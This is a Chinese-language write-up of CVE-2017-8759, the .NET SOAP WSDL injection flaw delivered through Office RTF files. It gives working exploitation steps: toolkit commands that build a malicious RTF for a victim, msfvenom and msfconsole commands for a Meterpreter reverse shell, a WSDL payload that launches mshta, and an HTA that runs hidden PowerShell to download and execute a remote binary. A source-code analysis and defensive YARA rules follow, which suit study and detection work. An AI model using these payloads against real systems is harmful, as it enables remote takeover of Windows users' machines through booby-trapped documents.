CVE-2017-8759
漏洞简介
在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码,原因是.NET Framework一个换行符处理失误,该漏洞影响所有主流的.NETFramework版本。由于主流的windows操作系统都默认内置了.net框架,黑客通过office文档嵌入远程的恶意.net代码进行攻击。
影响范围:windows office 用户
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.7
Microsoft .NET Framework 4.6
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 2.0 SP2
漏洞利用方法
用的是开源1 2 提供的工具list
# python cve-2017-8759_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen Generate Malicious file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running. For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.
usage
1) 制作恶意文档
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) 利用msf 模块利用 生成反弹shell
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) 开启本地payload 文件下载服务
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
EXP利用分析
通过开源 1的脚本:
python CreateRTF.py -f 文件名 -u expurlpath
filename: output file name
url: http[s]://example.com/exploit.txt
exploit.txt
<definitions
xmlns="http://schemas.xmlsoap.org/wsdl/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:suds="http://www.w3.org/2000/wsdl/suds"
xmlns:tns="http://schemas.microsoft.com/clr/ns/System"
xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">
<portType name="PortType"/>
<binding name="Binding" type="tns:PortType">
<soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
<suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
</binding>
<service name="Service">
<port name="Port" binding="tns:Binding">
<soap:address location="https://example.com?C:\Windows\System32\mshta.exe?https://example.com/cmd.jpg"/>
<soap:address location=";
if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {
System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);
System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);
} //"/>
</port>
</service>
</definitions>
RTF文档 执行后 ,远程从SOAP Moniker 从远程服务器拉取一个SOAP XML 文件, 指定.net库的 SOAP WSDL模块解析,从而触发漏洞
cmd.jpg
<html>
<head>
<script language="VBScript">
Sub window_onload
window.resizeTo 0,0
window.MoveTo -100,-100
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WScript.Shell")
Locator.Run"powershell.exe -nop -w hidden -c ""IEX (new-object net.webclient).downloadstring('http://192.168.211.149:80/artifact.exe')""",0,FALSE
window.close()
end sub
</script>
<!--
<script language="VBScript">
Sub window_onload
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WbemScripting.SWbemLocator")
Set Service = Locator.ConnectServer()
Service.Security_.ImpersonationLevel=impersonation
Set objStartup = Service.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set Process = Service.Get("Win32_Process")
Error = Process.Create("powershell.exe -nop -w hidden calc.exe", null, objConfig, intProcessID)
window.close()
end sub
</script>
-->
</head>
</html>
通过再次请求远程文件,来进行 pwershell 操作 进行 payload 执行 来执行远程木马payload (会有提权问题)
借鉴图片整理利用思路
漏洞分析
在.net库中的SOAP WSDL 解析模块IsValidUrl函数没有正确处理包含回车换行符的情况,导致调用者函数PrintClientProxy存在代码注入执行漏洞。
static StringBuilder vsb = new StringBuilder();
internal static string IsValidUrl(string value) #
{
if (!System.Runtime.Remoting.Configuration.AppSettings.AllowUnsanitizedWSDLUrls)
{
return WsdlParser.TransliterateString(value);
}
if (value == null)
{
return "\"\"";
}
vsb.Length= 0;
vsb.Append("@\"");
for (int i=0; i<value.Length; i++)
{
if (value[i] == '\"')
vsb.Append("\"\"");
else
vsb.Append(value[i]);
}
vsb.Append("\"");
return vsb.ToString();
}
YARA 规则:
规则 主要对这样的soap 格式进行 解析(无法保证误报)
private rule RTFFILE {
meta:
description = "Detects RTF files"
condition:
uint32be(0) == 0x7B5C7274
}
/* Rule Set ----------------------------------------------------------------- */
rule CVE_2017_8759_Mal_HTA {
meta:
description = "Detects malicious files related to CVE-2017-8759 - file cmd.hta"
author = "Florian Roth"
reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
date = "2017-09-14"
hash1 = "fee2ab286eb542c08fdfef29fabf7796a0a91083a0ee29ebae219168528294b5"
strings:
$x1 = "Error = Process.Create(\"powershell -nop cmd.exe /c" fullword ascii
condition:
( uint16(0) == 0x683c and filesize < 1KB and all of them )
}
rule CVE_2017_8759_Mal_Doc {
meta:
description = "Detects malicious files related to CVE-2017-8759 - file Doc1.doc"
author = "Florian Roth"
reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
date = "2017-09-14"
hash1 = "6314c5696af4c4b24c3a92b0e92a064aaf04fd56673e830f4d339b8805cc9635"
strings:
$s1 = "soap:wsdl=http://" ascii wide nocase
$s2 = "soap:wsdl=https://" ascii wide nocase
```
$c1 = "Project.ThisDocument.AutoOpen" fullword wide
```
condition:
( uint16(0) == 0xcfd0 and filesize < 500KB and 2 of them )
}
rule CVE_2017_8759_SOAP_via_JS {
meta:
description = "Detects SOAP WDSL Download via JavaScript"
author = "Florian Roth"
reference = "https://twitter.com/buffaloverflow/status/907728364278087680"
date = "2017-09-14"
score = 60
strings:
$s1 = "GetObject(\"soap:wsdl=https://" ascii wide nocase
$s2 = "GetObject(\"soap:wsdl=http://" ascii wide nocase
condition:
( filesize < 3KB and 1 of them )
}
rule CVE_2017_8759_SOAP_Excel {
meta:
description = "Detects malicious files related to CVE-2017-8759"
author = "Florian Roth"
reference = "https://twitter.com/buffaloverflow/status/908455053345869825"
date = "2017-09-15"
strings:
$s1 = "|'soap:wsdl=" ascii wide nocase
condition:
( filesize < 300KB and 1 of them )
}
rule CVE_2017_8759_SOAP_txt {
meta:
description = "Detects malicious file in releation with CVE-2017-8759 - file exploit.txt"
author = "Florian Roth"
reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
date = "2017-09-14"
hash1 = "840ad14e29144be06722aff4cc04b377364eeed0a82b49cc30712823838e2444"
strings:
$s1 = /<soap:address location="http[s]?:\/\/[^"]{8,140}.hta"/ ascii wide
$s2 = /<soap:address location="http[s]?:\/\/[^"]{8,140}mshta.exe"/ ascii wide
condition:
( filesize < 200KB and 1 of them )
}
rule CVE_2017_8759_WSDL_in_RTF {
meta:
description = "Detects malicious RTF file related CVE-2017-8759"
author = "Security Doggo @xdxdxdxdoa"
reference = "https://twitter.com/xdxdxdxdoa/status/908665278199996416"
date = "2017-09-15"
strings:
$doc = "d0cf11e0a1b11ae1"
$obj = "\\objupdate"
$wsdl = "7700730064006c003d00" nocase
$http1 = "68007400740070003a002f002f00" nocase
$http2 = "680074007400700073003a002f002f00" nocase
$http3 = "6600740070003a002f002f00" nocase
condition:
RTFFILE and $obj and $doc and $wsdl and 1 of ($http*)
}
